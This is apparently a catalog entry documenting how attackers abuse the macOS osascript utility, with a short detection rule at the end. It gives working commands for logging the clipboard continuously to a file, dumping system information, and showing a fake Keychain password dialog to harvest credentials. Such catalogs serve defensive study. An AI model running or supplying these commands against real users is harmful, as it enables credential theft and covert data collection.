Created by Cedric Owens (@cedowens)
The osascript binary is a command-line utility included in macOS that allows users to run AppleScript and Open Scripting Architecture (OSA) scripts or commands. AppleScript is a scripting language that is designed for power users to automate various tasks, application actions, and to interact with the operating system.
|2023-04-19||Collection Credential Access Discovery Execution||clipboard bash oneliner osascript systeminfo prompt jxa|
Use the osascript binary to gather sensitive clipboard data
A bash loop can gather clipboard contents over a defined time period. The following command calls /usr/bin/osascript -e ‘return (the clipboard)’ indefinitely every 10 seconds and writes clipboard content to a text file.
while true; do echo $(osascript -e 'return (the clipboard)') >> clipdata.txt; sleep 10; done
Use the osascript binary to gather system information
osascript can be used to gather the operating system version, current username, user ID, computer name, IP address, and other information.
osascript -e 'return (system info)'
Use the osascript binary to prompt the user for credentials
osascript can be used to generate a dialogue box and request the user to enter the keychain password.
osascript -e 'set popup to display dialog "Keychain Access wants to use the login keychain" & return & return & "Please enter the keychain password" & return default answer "" with icon file "System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:FileVaultIcon.icns" with title "Authentication Needed" with hidden answer'
- Command Line Argument Detection (args contain osascript AND -e AND clipboard)